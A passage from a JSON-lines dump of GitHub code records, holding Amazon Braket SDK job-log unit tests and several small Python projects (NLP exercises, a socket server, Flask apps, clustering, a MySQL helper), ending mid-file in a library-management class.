poll_interval_seconds=0)\n\n captured = capsys.readouterr()\n assert captured.out == \"\\n\".join(\n (\n \"..\",\n \"hi there #1\",\n \"hi there #2\",\n \"hi there #2a\",\n \"hi there #3\",\n \"\",\n )\n )\n\n\n@patch.dict(\"os.environ\", {\"JPY_PARENT_PID\": \"True\"})\ndef test_logs_multiple_instances(\n quantum_job,\n generate_get_job_response,\n log_events_responses,\n log_stream_responses,\n capsys,\n):\n quantum_job._aws_session.get_job.side_effect = (\n generate_get_job_response(status=\"RUNNING\", instanceConfig={\"instanceCount\": 2}),\n generate_get_job_response(status=\"RUNNING\"),\n generate_get_job_response(status=\"RUNNING\"),\n generate_get_job_response(status=\"RUNNING\"),\n generate_get_job_response(status=\"COMPLETED\"),\n )\n log_stream_responses[-1][\"logStreams\"].append({\"logStreamName\": \"stream-2\"})\n quantum_job._aws_session.describe_log_streams.side_effect = log_stream_responses\n\n event_counts = {\n \"stream-1\": 0,\n \"stream-2\": 0,\n }\n\n def get_log_events(log_group, log_stream, start_time, start_from_head, next_token):\n log_events_dict = {\n \"stream-1\": log_events_responses,\n \"stream-2\": log_events_responses,\n }\n log_events_dict[\"stream-1\"] += (\n {\n \"nextForwardToken\": None,\n \"events\": [],\n },\n {\n \"nextForwardToken\": None,\n \"events\": [],\n },\n )\n log_events_dict[\"stream-2\"] += (\n {\n \"nextForwardToken\": None,\n \"events\": [\n {\"timestamp\": 3, \"message\": \"hi there #3\"},\n {\"timestamp\": 4, \"message\": \"hi there #4\"},\n ],\n },\n {\n \"nextForwardToken\": None,\n \"events\": [],\n },\n )\n event_counts[log_stream] += 1\n return log_events_dict[log_stream][event_counts[log_stream]]\n\n quantum_job._aws_session.get_log_events.side_effect = get_log_events\n\n quantum_job.logs(wait=True, poll_interval_seconds=0)\n\n captured = capsys.readouterr()\n assert captured.out == \"\\n\".join(\n (\n \"..\",\n \"\\x1b[34mhi there #1\\x1b[0m\",\n \"\\x1b[35mhi there #1\\x1b[0m\",\n \"\\x1b[34mhi there #2\\x1b[0m\",\n \"\\x1b[35mhi there #2\\x1b[0m\",\n \"\\x1b[34mhi there #2a\\x1b[0m\",\n \"\\x1b[35mhi there #2a\\x1b[0m\",\n \"\\x1b[34mhi there #3\\x1b[0m\",\n \"\\x1b[35mhi there #3\\x1b[0m\",\n \"\\x1b[35mhi there #4\\x1b[0m\",\n \"\",\n )\n )\n\n\ndef test_logs_error(quantum_job, generate_get_job_response, capsys):\n quantum_job._aws_session.get_job.side_effect = (\n generate_get_job_response(status=\"RUNNING\"),\n generate_get_job_response(status=\"RUNNING\"),\n generate_get_job_response(status=\"COMPLETED\"),\n )\n quantum_job._aws_session.describe_log_streams.side_effect = (\n ClientError(\n {\n \"Error\": {\n \"Code\": \"UnknownCode\",\n \"Message\": \"Some error message\",\n }\n },\n \"DescribeLogStreams\",\n ),\n )\n\n with pytest.raises(ClientError, match=\"Some error message\"):\n quantum_job.logs(wait=True, poll_interval_seconds=0)\n\n\ndef test_initialize_session_for_valid_non_regional_device(aws_session, caplog):\n device_arn = \"arn:aws:braket:::device/qpu/test/device-name\"\n first_region = aws_session.region\n logger = logging.getLogger(__name__)\n\n aws_session.get_device.side_effect = [\n ClientError(\n {\n \"Error\": {\n \"Code\": \"ResourceNotFoundException\",\n }\n },\n \"getDevice\",\n ),\n ClientError(\n {\n \"Error\": {\n \"Code\": \"ResourceNotFoundException\",\n }\n },\n \"getDevice\",\n ),\n device_arn,\n ]\n\n caplog.set_level(logging.INFO)\n AwsQuantumJob._initialize_session(aws_session, device_arn, logger)\n\n assert f\"Changed session region from '{first_region}' to '{aws_session.region}'\" in caplog.text\n\n\ndef test_initialize_session_for_valid_regional_device(aws_session, caplog):\n device_arn = f\"arn:aws:braket:{aws_session.region}::device/qpu/test/device-name\"\n logger = logging.getLogger(__name__)\n aws_session.get_device.return_value = device_arn\n caplog.set_level(logging.INFO)\n AwsQuantumJob._initialize_session(aws_session, device_arn, logger)\n assert not caplog.text\n\n\n@pytest.mark.parametrize(\n \"get_device_side_effect, expected_exception\",\n [\n (\n [\n ClientError(\n {\n \"Error\": {\n \"Code\": \"ResourceNotFoundException\",\n }\n },\n \"getDevice\",\n )\n ],\n ValueError,\n ),\n (\n [\n ClientError(\n {\n \"Error\": {\n \"Code\": \"ThrottlingException\",\n }\n },\n \"getDevice\",\n )\n ],\n ClientError,\n ),\n ],\n)\ndef test_regional_device_raises_error(\n get_device_side_effect, expected_exception, aws_session, caplog\n):\n device_arn = f\"arn:aws:braket:{aws_session.region}::device/qpu/test/device-name\"\n aws_session.get_device.side_effect = get_device_side_effect\n logger = logging.getLogger(__name__)\n caplog.set_level(logging.INFO)\n with pytest.raises(expected_exception):\n AwsQuantumJob._initialize_session(aws_session, device_arn, logger)\n aws_session.get_device.assert_called_with(device_arn)\n assert not caplog.text\n\n\ndef test_regional_device_switches(aws_session, caplog):\n original_region = aws_session.region\n device_region = \"us-east-1\"\n device_arn = f\"arn:aws:braket:{device_region}::device/qpu/test/device-name\"\n mock_session = Mock()\n mock_session.get_device.side_effect = device_arn\n aws_session.copy_session.side_effect = [mock_session]\n logger = logging.getLogger(__name__)\n caplog.set_level(logging.INFO)\n\n assert mock_session == AwsQuantumJob._initialize_session(aws_session, device_arn, logger)\n\n aws_session.copy_session.assert_called_with(region=device_region)\n mock_session.get_device.assert_called_with(device_arn)\n assert f\"Changed session region from '{original_region}' to '{device_region}'\" in caplog.text\n\n\ndef test_initialize_session_for_invalid_device(aws_session, device_arn):\n logger = logging.getLogger(__name__)\n aws_session.get_device.side_effect = ClientError(\n {\n \"Error\": {\n \"Code\": \"ResourceNotFoundException\",\n }\n },\n \"getDevice\",\n )\n\n device_not_found = f\"'{device_arn}' not found.\"\n with pytest.raises(ValueError, match=device_not_found):\n AwsQuantumJob._initialize_session(aws_session, device_arn, logger)\n\n\ndef test_no_region_routing_simulator(aws_session):\n logger = logging.getLogger(__name__)\n\n aws_session.get_device.side_effect = ClientError(\n {\n \"Error\": {\n \"Code\": \"ResourceNotFoundException\",\n }\n },\n \"getDevice\",\n )\n\n device_arn = \"arn:aws:braket:::device/simulator/test/device-name\"\n device_not_found = f\"Simulator '{device_arn}' not found in 'us-west-2'\"\n with pytest.raises(ValueError, match=device_not_found):\n AwsQuantumJob._initialize_session(aws_session, device_arn, logger)\n\n\ndef test_exception_in_credentials_session_region(device_arn, aws_session):\n logger = logging.getLogger(__name__)\n\n aws_session.get_device.side_effect = ClientError(\n {\n \"Error\": {\n \"Code\": \"SomeOtherErrorMessage\",\n }\n },\n \"getDevice\",\n )\n\n error_message = (\n \"An error occurred \\\\(SomeOtherErrorMessage\\\\) \"\n \"when calling the getDevice operation: Unknown\"\n )\n with pytest.raises(ClientError, match=error_message):\n AwsQuantumJob._initialize_session(aws_session, device_arn, logger)\n\n\ndef test_exceptions_in_all_device_regions(aws_session):\n device_arn = \"arn:aws:braket:::device/qpu/test/device-name\"\n logger = logging.getLogger(__name__)\n\n aws_session.get_device.side_effect = [\n ClientError(\n {\n \"Error\": {\n \"Code\": \"ResourceNotFoundException\",\n }\n },\n \"getDevice\",\n ),\n ClientError(\n {\n \"Error\": {\n \"Code\": \"SomeOtherErrorMessage\",\n }\n },\n \"getDevice\",\n ),\n ]\n\n error_message = (\n \"An error occurred \\\\(SomeOtherErrorMessage\\\\) \"\n \"when calling the getDevice operation: Unknown\"\n )\n with pytest.raises(ClientError, match=error_message):\n AwsQuantumJob._initialize_session(aws_session, device_arn, logger)\n\n\n@patch(\"braket.aws.aws_quantum_job.AwsSession\")\ndef test_initialize_session_local_device(mock_new_session, aws_session):\n logger = logging.getLogger(__name__)\n device = \"local:provider.device.name\"\n # don't change a provided AwsSession\n assert AwsQuantumJob._initialize_session(aws_session, device, logger) == aws_session\n # otherwise, create an AwsSession with the profile defaults\n assert AwsQuantumJob._initialize_session(None, device, logger) == mock_new_session()\n\n\ndef test_bad_device_arn_format(aws_session):\n logger = logging.getLogger(__name__)\n device_not_found = (\n \"Device ARN is not a valid format: bad-arn-format. For valid Braket ARNs, \"\n \"see 'https://docs.aws.amazon.com/braket/latest/developerguide/braket-devices.html'\"\n )\n\n with pytest.raises(ValueError, match=device_not_found):\n AwsQuantumJob._initialize_session(aws_session, \"bad-arn-format\", logger)\n","repo_name":"amazon-braket/amazon-braket-sdk-python","sub_path":"test/unit_tests/braket/aws/test_aws_quantum_job.py","file_name":"test_aws_quantum_job.py","file_ext":"py","file_size_in_byte":34394,"program_lang":"python","lang":"en","doc_type":"code","stars":261,"dataset":"github-code","pt":"72"} +{"seq_id":"25414352655","text":"# coding: utf-8\nfrom __future__ import division, print_function, unicode_literals\nimport sys\nimport re\nfrom operator import itemgetter\nimport codecs\nimport random\n\n\ndef set_encoding(enc='utf_8'):\n sys.stdin = codecs.getreader(enc)(sys.stdin)\n sys.stdout = codecs.getwriter(enc)(sys.stdout)\n sys.stderr = codecs.getwriter(enc)(sys.stderr)\n\n\ndef proc0():\n s = 'stressed'\n t = s[::-1]\n print('t = ' + t)\n\n\ndef proc1():\n s = 'パタトクカシーー'\n t = s[1::2]\n print('t = ' + t)\n\n\ndef proc2():\n s = 'パトカー'\n t = 'タクシー'\n u = ''.join(s[i] + t[i] for i in xrange(len(s)))\n print('u = ' + u)\n\n\ndef proc3():\n s = 'Now I need a drink, alcoholic of course, after the heavy lectures involving quantum mechanics.'\n ss = s.split(' ')\n t = [len(re.sub('\\W', '', w)) for w in ss]\n print('repr(t) = ' + repr(t))\n\n\ndef proc4():\n s = 'Hi He Lied Because Boron Could Not Oxidize Fluorine. New Nations Might Also Sign Peace Security Clause. Arthur King Can.'\n a = map(lambda x: x - 1, [1, 5, 6, 7, 8, 9, 15, 16, 19])\n m = {}\n for i, ss in enumerate(s.split(' ')):\n if i in a:\n m[ss[:1]] = i + 1\n else:\n m[ss[:2]] = i + 1\n l = [item for item in m.iteritems()]\n l.sort(key=itemgetter(1))\n print(repr(l))\n\n\ndef proc5():\n s = raw_input('> ')\n n = 2\n print('# word {}-gram #'.format(n))\n print(repr(word_n_gram(s, 2)))\n print('# char {}-gram #'.format(n))\n print(repr(char_n_gram(s, 2)))\n\n\ndef char_n_gram(s, n):\n return [s[i:i + n] for i in xrange(len(s) - n + 1)]\n\n\ndef word_n_gram(s, n, delim=' '):\n ws = s.split(delim)\n return [ws[i:i + n] for i in xrange(len(ws) - n + 1)]\n\n\ndef proc6():\n s = 'paraparaparadise'\n t = 'paragraph'\n X = set(char_n_gram(s, 2))\n Y = set(char_n_gram(t, 2))\n print('X & Y = ' + repr(X & Y))\n print('X | Y = ' + repr(X | Y))\n print('X - Y = ' + repr(X - Y))\n print('\"se\" in X = ' + repr(u\"se\" in X))\n print('\"se\" in Y = ' + repr(u\"se\" in Y))\n\n\ndef proc7():\n def fn(x, y, z):\n return '{}時の{}は{}'.format(x, y, z)\n\n print(fn(12, '気温', 22.4))\n\n\ndef proc8():\n text = raw_input('> ')\n\n def cipher(s):\n def repl(c):\n if re.match(r'\\w', c):\n return chr(219 - ord(c))\n return c\n\n return ''.join(repl(c) for c in s)\n\n print(cipher(text))\n\n\ndef proc9():\n text = raw_input('> ')\n\n def typoglycemia(s):\n ret = []\n for ss in s.split(' '):\n if len(ss) < 4:\n ret.append(ss)\n continue\n t = list(ss)[1:-1]\n random.shuffle(t)\n ret.append(ss[0] + ''.join(t) + ss[-1])\n return ' '.join(ret)\n\n print(typoglycemia(text))\n\n\ndef main():\n if len(sys.argv) < 2:\n print('usage: python {} NUM'.format(sys.argv[0]), file=sys.stderr)\n sys.exit(1)\n num = int(sys.argv[1])\n eval('proc{}()'.format(num))\n\n\nif __name__ == '__main__':\n set_encoding()\n main()\n","repo_name":"arosh/nlp100-2015","sub_path":"chapter1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18196334656","text":"# from..config import Config\n# from app.cache.redis_cache import Redis\n\n\n\n# static_file_cache\n# db_cache\n\nclass ModelCache:\n \"\"\"\n \"\"\"\n\n def __init__(self, model:object, cache_schema:object):\n \"\"\"\n \"\"\"\n model_name = model.__name__\n model_data = {}\n for model_row in model.query.all():\n model_data.update({\n str(model_row.id): model_row.to_json()\n })\n self.model = {\n model_name: model_data\n }\n print(self.model)\n","repo_name":"BonkaNyde/bat_cave","sub_path":"app/cache/cache_manager.py","file_name":"cache_manager.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36151689314","text":"import socket\nimport codecs\n\n\nclass ServerSocket:\n\n def __init__(self):\n self.runServer = True\n\n def initServer(self):\n HOST = 'localhost'\n PORT = 8080\n barcode = ''\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:\n print('\\nIniciando el servidor socket..')\n result = ''\n # 60 segs of utility, after that the socket died.\n server.settimeout(10)\n # If another socket are bound to the same address that this socket\n # gonna use, the old socket just go to BLOCKING MODE and let this\n # socket use the address. 👍\n try:\n server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n except Exception:\n pass\n server.bind((HOST, PORT))\n print(f'\\nconectado al host: { HOST }')\n print(f'conectado al puerto: { PORT }\\n')\n server.listen(1)\n try:\n conn, addr = server.accept()\n with conn:\n print('Conectado con: ', addr)\n while conn:\n data = conn.recv(4096)\n if data:\n conn.send(b'1')\n if not data:\n break\n result = codecs.decode(data)\n barcode = result\n print(f'Barcode: {result}')\n\n except socket.timeout:\n print('Socket server timeout')\n\n print('Servidor socket apagado.\\n')\n server.close()\n return barcode\n\n def disconnectServer(self):\n self.runServer = False\n","repo_name":"Pedro-Nicolas-Rios-Vargas/BCScript","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17144800209","text":"import numpy as np\nfrom typing import List, Tuple\nfrom dataclasses import dataclass\nfrom abc import ABC, abstractmethod\n\n\n@dataclass\nclass TrainingSample:\n \"\"\" Sample for training \"\"\"\n\n current_state: np.ndarray = np.array(\n []\n ) # set of images concatenated along axis-2 (h x w x n)\n action: int = -1 # action taken by network for current_state\n reward: float = 0 # reward rxd for action\n last_episode_state: bool = False # if true, episode ended because of action taken in the current state\n next_state: np.ndarray = np.array([]) # next state after taking action\n\n\nclass Network(ABC):\n \"\"\" Base class for all networks \"\"\"\n\n @abstractmethod\n def init(\n self,\n input_shape: Tuple[int],\n num_actions: int,\n discount_factor: float,\n tb_logdir: str,\n env_action_space: List[int],\n tb_writer,\n ):\n assert False\n\n @abstractmethod\n def predict(\n self,\n state: List[np.ndarray],\n convert_to_openai_action_space=True,\n predict_all_actions=False,\n ):\n \"\"\" if predict_all_actions is true, it returns the output of the network directly (np.ndarray(num_actions), else it returns a single number corresponding to the action with the largest Q value)\"\"\"\n assert False\n\n @abstractmethod\n def train(self, batch_idx: int, batch: List[TrainingSample]):\n assert False\n\n @abstractmethod\n def save(self, chkpt_folder, epi_cnt):\n \"\"\" saves the checkpoint \"\"\"\n assert False\n","repo_name":"acharyahemanth/RL-atari","sub_path":"networks/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6760539411","text":"import logging\n\nfrom aiogram import Dispatcher\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.types import Message\nfrom tg_bot.dialog_states.questions_box_states import QuestionsBoxDialog\nfrom tg_bot.users import User, users\n\n\nclass QuestionsBoxService:\n def __init__(self):\n pass\n\n async def save_questions(self, message: Message, state: FSMContext):\n answer = message.text\n user = message.from_user.id\n\n if user not in users:\n users[user] = User(user_questions=[answer])\n\n else:\n users[user].user_questions.append(answer)\n\n await state.finish()\n\n await message.answer(text=f\"Answer saved {users[user].user_questions}\",\n parse_mode=\"HTML\")\n\n async def request_question(self, message: Message):\n await message.answer(text=\"Задайте вопрос\", parse_mode=\"HTML\")\n\n await QuestionsBoxDialog.question.set()\n","repo_name":"KuranovaPolina/suai-bot-student-telegram-client","sub_path":"tg_bot/handlers/questions_box.py","file_name":"questions_box.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"20685523467","text":"from flask import Flask, request, send_from_directory\r\nfrom flask_cors import CORS, cross_origin\r\n\r\napp = Flask(__name__, static_folder='GrammarChecker/build', static_url_path='')\r\nCORS(app)\r\n\r\n@app.route(\"/\")\r\n@cross_origin()\r\ndef serve():\r\n return send_from_directory(app.static_folder, 'index.html')\r\n\r\n@app.route(\"/incomingData\", methods=['POST'])\r\n@cross_origin()\r\ndef data():\r\n import spellcheck\r\n request_data=request.get_json()\r\n data=request_data['data']\r\n res=spellcheck.correct_word_spelling(data)\r\n ans=''\r\n for i in res:\r\n ans+=i\r\n ans+=\" \"\r\n return ans\r\n\r\nif __name__ == '__main__':\r\n app.run(host=\"0.0.0.0\", port=5000, debug=True, threaded=True)","repo_name":"NaK915/Spell-Checker","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10962163478","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jun 3 22:25:52 2020\r\n\r\n@author: Giovanni\r\n\"\"\"\r\n\r\n# Agrupamento com algoritmo K-medoids \r\n# esse algoritmo escolhe pontos reais ja existentes na base de dados \r\n\r\n#pip install pyclustering\r\n\r\nfrom sklearn import datasets\r\nfrom sklearn.metrics import confusion_matrix\r\nimport numpy as np\r\nfrom pyclustering.cluster.kmedoids import kmedoids \r\nfrom pyclustering.cluster import cluster_visualizer\r\n\r\niris = datasets.load_iris()\r\n\r\n# nos vamos trabalhar com o agrupamento dos atributos 0 e 1 \r\n# pois essa função de visualização so nos permite ver dois atributos \r\n\r\ncluster = kmedoids(iris.data[:,0:2], [3,12,20])\r\n # dados[todas as linhas, colunas 0 e 1 ]\r\n # [3,12,20] = initial_index_medoid = indice dos pontos na base de dados q vamos utilizar para indexação\r\n # é comum usar pontos aleatórios mesmo, nao faz muita diferença \r\ncluster.get_medoids() \r\n # Out[21]: [3, 12, 20] \r\ncluster.process()\r\n # a função process faz o treinamento, ou melhor, o agrupamento \r\nprevisoes = cluster.get_clusters()\r\n\r\nmedoids = cluster.get_medoids()\r\n # encontramos os pontos 7, 67 e 112, que são nossos verdadeiros medoids \r\n\r\n#Visualização do cluster:\r\nv = cluster_visualizer()\r\nv.append_clusters(previsoes, iris.data[:,0:2])\r\nv.append_cluster(medoids, iris.data[:,0:2], marker='*', markersize=15) # para marcar com estrela onde estão os medoids \r\nv.show()\r\n\r\n# Comparativo para ver os acertos: \r\n # Precisamos fazer uma coficação manual para conseguir gerar uma variavel no padrão do iris.target\r\n # para conseguir usar a confusion_matrix:\r\nlista_previsoes = []\r\nlista_real = []\r\nfor i in range(len(previsoes)):\r\n print('-----')\r\n print(i)\r\n print('-----')\r\n \r\n for j in range(len(previsoes[i])):\r\n #print(j)\r\n print(previsoes[i][j])\r\n lista_previsoes.append(i) \r\n lista_real.append(iris.target[previsoes[i][j]])\r\n \r\n# Transformando essas duas listas pro formato do numpy array\r\nlista_previsoes = np.asarray(lista_previsoes)\r\nlista_real = np.asarray(lista_real)\r\n\r\nresultados = confusion_matrix(lista_real, lista_previsoes)\r\n # contabilizamos 26 erros ","repo_name":"GiovanniBru/Data-Science","sub_path":"testes python/24_agrupamento_kmedoids.py","file_name":"24_agrupamento_kmedoids.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41655679487","text":"# -*- coding: utf-8 -*-\nimport MySQLdb\nimport config\n\nclass JediMaster:\n def __init__(self):\n self.db = {}\n self.jedi = MySQLdb.connect(u\"localhost\", config.user, config.password)\n self.set_encoding(self.jedi)\n\n def get_database(self, database = None):\n if not database: return self.jedi\n if database not in self.db:\n self.db[database] = MySQLdb.connect(u\"localhost\", config.user, config.password, database)\n self.set_encoding(self.db[database])\n return self.db[database]\n\n def set_encoding(self, db):\n db.set_character_set('utf8')\n cursor = db.cursor()\n cursor.execute(u'SET NAMES utf8;')\n cursor.execute(u'SET CHARACTER SET utf8;')\n cursor.execute(u'SET character_set_connection=utf8;')\n\n def create_database(self, db):\n cursor = self.get_database().cursor()\n cursor.execute(u\"CREATE DATABASE IF NOT EXISTS {} DEFAULT CHARACTER SET utf8 DEFAULT COLLATE utf8_general_ci\".format(db))\n\n def create_table(self, database, table, columns):\n cursor = self.get_database(database).cursor()\n for i in xrange(len(columns)): columns[i] = u\" \".join(columns[i])\n columns = u\", \".join(columns)\n command = u\"CREATE TABLE IF NOT EXISTS {} ({})\".format(table, columns)\n cursor.execute(command)\n\n def insert_column(self, database, table, column):\n cursor = self.get_database(database).cursor()\n s = u\", \".join([u\"%s\"] * len(column))\n cursor.execute(u\"INSERT INTO {} VALUES ({})\".format(table, s), column)\n\n def insert_column_custom(self, database ,table, column):\n cursor = self.get_database(database).cursor()\n key = []\n value = []\n for k in column.keys():\n key.append(k)\n value.append(u\"%({})s\".format(k))\n key = \", \".join(key)\n value = \", \".join(value)\n cursor.execute(u\"INSERT INTO {} ({}) VALUES ({})\".format(table, key, value), column)\n\n def execute(self, database, query):\n cursor = self.get_database(database).cursor()\n cursor.execute(query)\n return cursor.fetchall()\n\n def commit(self, database):\n db = self.get_database(database)\n db.commit()\n","repo_name":"oalieno/JediSQL","sub_path":"JediSQL.py","file_name":"JediSQL.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"12861080206","text":"from collections import deque\n\ndef solution(skill, skill_trees):\n skillList = set(skill)\n cnt = 0\n\n for st in skill_trees:\n tmpStr = ''\n st = deque(list(st))\n while st: # 순서에 있는 스킬들만 뽑아서 찍어본다\n tmpChar = st.popleft()\n if tmpChar in skillList:\n tmpStr += tmpChar\n\n idx = 0\n while idx < len(tmpStr): # 내가 찍은 스킬트리와 스킬 순서를 앞부터 한글자 씩 비교\n if skill[idx] != tmpStr[idx]:\n break\n idx += 1\n else:\n cnt += 1\n\n return cnt\n\nif __name__ == \"__main__\":\n skill, skill_trees = \"CBD\", [\"BACDE\", \"CBADF\", \"AECB\", \"BDA\"]\n print(solution(skill, skill_trees)) # 2","repo_name":"LastCow9000/Algorithms","sub_path":"Algorithm/Programmers/스킬트리/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31767650967","text":"import numpy as np\n\nfrom tf_from_sql.db import SensorLogEntry, Session\n\n\ndef create_samples_from_db() -> tuple[np.ndarray, np.ndarray]:\n session = Session()\n session_log_entries = list(session.query(SensorLogEntry))\n\n num_sensors = 2 # sensors ids are in range(num_sensors)\n num_events = 3 # event ids are in range(num_events)\n\n # features\n X = np.zeros((len(session_log_entries), num_sensors), dtype=\"float32\")\n # labels\n Y_true = np.zeros((len(session_log_entries), num_events), dtype=\"float32\")\n for i, session_log_entry in enumerate(session_log_entries):\n # one-hot encoding of features and labels\n X[i, session_log_entry.sensor] = 1.0\n Y_true[i, session_log_entry.event] = 1.0\n\n return X, Y_true\n","repo_name":"AlexElvers/tf-from-sql","sub_path":"tf_from_sql/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"38842273050","text":"from flask import Flask, jsonify\nfrom flask import request\nfrom Bio import Entrez\nfrom spacy.matcher import Matcher\nimport spacy\nfrom age_matcher import get_age\nfrom analyte_matcher import load_analytes\nfrom analyte_matcher import get_analytes\nfrom analyte_matcher import createMatcher\nfrom omic_matcher import createMetaboliteMatcher\nfrom control_group_matcher import get_control_groups, get_healthy_control_groups\nfrom fluid_matcher import get_fluids\nfrom n_matcher import get_n\nfrom omic_matcher import get_omics, load_metabolites\nfrom sex_matcher import get_sexes\n\nnlp = spacy.load(\"en_core_web_trf\")\ntest = spacy.load(\"en_ner_bionlp13cg_md\")\n\nemail = ''\nmetabolite_list = load_metabolites('metabolites.csv')\nanalyte_list = load_analytes('analytes.csv')\nanaylte_matcher = createMatcher(nlp, analyte_list)\nmetabolite_matcher = createMetaboliteMatcher(nlp, metabolite_list)\n\napp = Flask(__name__)\n\n@app.route('/paper')\ndef papers():\n doi = request.args.get('doi')\n pmid = request.args.get('pmid')\n Entrez.email = email\n if(doi):\n handle = Entrez.esearch(db=\"pubmed\", term=doi, retmax=100)\n record = Entrez.read(handle)\n id = record['IdList']\n handle.close()\n else:\n id = pmid\n handle = Entrez.elink(dbfrom=\"pubmed\", db=\"pmc\", linkname=\"pubmed_pmc\", id=''.join(id), retmode=\"xml\")\n id_return = Entrez.read(handle)\n handle.close()\n handle = Entrez.efetch(db=\"pmc\", id=id_return[0]['LinkSetDb'][0]['Link'][0]['Id']) \n records = handle.read()\n handle.close()\n results = []\n text = nlp(records.decode(\"utf-8\").replace('\\n', ' '))\n potential_n = get_n(nlp, text)\n umlstext = test(text)\n potential_sexes = get_sexes(nlp, text)\n potential_fluids = get_fluids(nlp, text)\n potential_omics = get_omics(nlp, text)\n potential_ages = get_age(nlp, text)\n potential_control_groups = get_control_groups(nlp, text)\n potential_healthy_control_groups = get_healthy_control_groups(nlp, text)\n potential_analytes = get_analytes(nlp, text, analyte_list)\n results.append({\n 'doi': doi,'input': [t.text for t in text], \n 'size': [{'start':item.start, 'end': item.end} for item in potential_n], \n 'fluids':[{'start':item.start, 'end': item.end} for item in potential_fluids], \n 'sexes':[{'start':item.start, 'end': item.end} for item in potential_sexes], \n 'ages':[{'start':item.start, 'end': item.end} for item in potential_ages],\n 'omics':[{'start':item.start, 'end': item.end} for item in potential_omics],\n 'controlGroups': [{'start':item.start, 'end': item.end} for item in potential_control_groups],\n 'healthyControlGroups': [{'start':item.start, 'end': item.end} for item in potential_healthy_control_groups],\n 'analytes': [{'start':item.start, 'end': item.end} for item in potential_analytes],\n 'umls': [{'start': item.start, 'end': item.end, 'label': item.label_, 'text': item.text} for item in umlstext.ents],\n })\n return '
'.join(results)\n\n@app.route(\"/abstract\")\ndef entrance():\n doi = request.args.get('doi')\n pmid = request.args.get('pmid')\n print(pmid, flush=True)\n dois = str(doi).split(',')\n abstract_dict = {}\n without_abstract = []\n Entrez.email = email\n if (doi):\n handle = Entrez.esearch(db=\"pubmed\", term=' OR '.join(dois), retmax=100)\n record = Entrez.read(handle)\n ids = record['IdList']\n handle.close()\n else:\n ids = pmid.split(',')\n handle = Entrez.efetch(db=\"pubmed\", id=','.join(ids),rettype=\"xml\", retmode=\"text\")\n records = Entrez.read(handle)\n for pubmed_article in records['PubmedArticle']:\n pmid = int(str(pubmed_article['MedlineCitation']['PMID']))\n article = pubmed_article['MedlineCitation']['Article']\n if 'Abstract' in article:\n abstract = ' '.join(article['Abstract']['AbstractText']).replace(',', '')\n abstract_dict[pmid] = abstract.encode(\"ascii\", \"ignore\").decode()\n else:\n without_abstract.append(pmid)\n handle.close()\n results = []\n for key, abstract in abstract_dict.items():\n text = nlp(abstract)\n umlstext = test(abstract)\n potential_n = get_n(nlp, text)\n potential_sexes = get_sexes(nlp, text)\n potential_fluids = get_fluids(nlp, text)\n potential_omics = get_omics(nlp, text, metabolite_matcher)\n potential_ages = get_age(nlp, text)\n potential_control_groups = get_control_groups(nlp, text)\n potential_healthy_control_groups = get_healthy_control_groups(nlp, text)\n potential_analytes = get_analytes(text, anaylte_matcher)\n results.append({\n 'doi': key,'input': [t.text for t in text], \n 'size': [{'start':item.start, 'end': item.end} for item in potential_n], \n 'fluids':[{'start':item.start, 'end': item.end} for item in potential_fluids], \n 'sexes':[{'start':item.start, 'end': item.end} for item in potential_sexes], \n 'ages':[{'start':item.start, 'end': item.end} for item in potential_ages],\n 'omics':[{'start':item.start, 'end': item.end} for item in potential_omics],\n 'controlGroups': [{'start':item.start, 'end': item.end} for item in potential_control_groups],\n 'healthyControlGroups': [{'start':item.start, 'end': item.end} for item in potential_healthy_control_groups],\n 'analytes': [{'start':item.start, 'end': item.end} for item in potential_analytes],\n 'umls': [{'start': item.start, 'end': item.end, 'label': item.label_, 'text': item.text} for item in umlstext.ents],\n })\n if (len(abstract_dict.items()) > 0):\n response = jsonify(results)\n response.headers.add(\"Access-Control-Allow-Origin\", \"*\")\n return response\n else:\n return '

no abstract

'\n\n\nif __name__ == '__main__':\n print('loading')\n app.run(port=9090)","repo_name":"MatthewMong/paperAnalyzer","sub_path":"extraResources/backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6713972905","text":"# Create a library class\n# display book\n# lend book - (who owns the book if not present)\n# add book\n# return book\n\n# SauravLibrary = Library (Listofbooks, library_name)\n\n# dictionary (books-nameofperson)\n\n# create a main function and run an infinite while loop asking\n# users for their input\n\nclass Library:\n def __init__(self,booklist,name):\n self.booklist=booklist\n self.name=name\n self.lenddict={}\n def displaybook(self):\n print(f\"\\nAll available books in our {self.name} library :\\b\")\n for book in self.booklist:\n print(book)\n def lendbook(self,user,book):\n if book not in self.lenddict and book in self.booklist:\n self.lenddict[book]=user\n self.booklist.remove(book)\n print(f\"\\n{book} is now given to {user}\")\n else:\n if book in 